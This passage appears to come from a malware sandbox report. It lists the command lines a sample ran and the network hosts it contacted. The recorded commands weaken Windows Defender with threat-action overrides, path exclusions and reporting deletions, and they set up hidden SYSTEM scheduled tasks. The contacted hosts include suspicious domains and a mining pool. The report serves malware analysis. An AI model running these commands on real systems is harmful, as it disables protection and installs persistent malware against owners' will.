REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBGfdOZyo" /SC once /ST 01:33:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBGfdOZyo"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBGfdOZyo"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "imJjYhUpaoZYZHtqO" /SC once /ST 01:37:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe\" HI /BKsite_idUjG 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "imJjYhUpaoZYZHtqO"
C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe
C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe HI /BKsite_idUjG 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bnTqljwkAIckBwCXiX"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PrqbyCvyRaPTCyA" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PrqbyCvyRaPTCyA2" /F /xml "C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PrqbyCvyRaPTCyA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PrqbyCvyRaPTCyA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "EJkQkmQiAqyKIE" /F /xml "C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eaHFzrxPPpjLp2" /F /xml "C:\ProgramData\uOkirCjeoMUvNKVB\CWEiTPx.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xjLLdQpZPaFaxvNZz2" /F /xml "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dfmYRzBlaRqgkDuyWQh2" /F /xml "C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ovLFxavpEMJUeWygf" /SC once /ST 00:38:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll\",#1 /Phsite_idzPm 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ovLFxavpEMJUeWygf"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\yQsvKirx\lMbqfeR.dll",#1 /Phsite_idzPm 385118
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "imJjYhUpaoZYZHtqO"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ovLFxavpEMJUeWygf"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | voxel.dofuly.info | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 91.92.250.47:80 | 91.92.250.47 | tcp |
| NL | 91.92.250.47:80 | 91.92.250.47 | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 104.21.13.170:443 | sty.ink | tcp |
| US | 104.21.62.68:80 | voxel.dofuly.info | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| RU | 81.94.159.197:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | 564675367.xyz | udp |
| SK | 45.95.11.69:443 | 564675367.xyz | tcp |
| US | 8.8.8.8:53 | 126.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.62.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.159.94.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.11.95.45.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | 187.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 23.216.145.82.in-addr.arpa | udp |
| NL | 185.26.182.111:443 | features.opera-api2.com | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.176:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 176.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| KR | 220.82.134.210:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| RU | 5.42.64.44:80 | 5.42.64.44 | tcp |
| US | 8.8.8.8:53 | 210.134.82.220.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| RU | 5.42.64.44:80 | 5.42.64.44 | tcp |
| US | 8.8.8.8:53 | 44.64.42.5.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| RU | 5.42.64.44:80 | 5.42.64.44 | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| RU | 5.42.64.44:80 | 5.42.64.44 | tcp |
| US | 8.8.8.8:53 | 166.138.96.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | 80.232.23.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | theonlyreasonwhywe.pro | udp |
| US | 172.67.218.191:443 | theonlyreasonwhywe.pro | tcp |
| US | 8.8.8.8:53 | wisemassiveharmonious.shop | udp |
| US | 8.8.8.8:53 | colorfulequalugliess.shop | udp |
| US | 104.21.19.68:443 | colorfulequalugliess.shop | tcp |
| US | 8.8.8.8:53 | 191.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.19.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
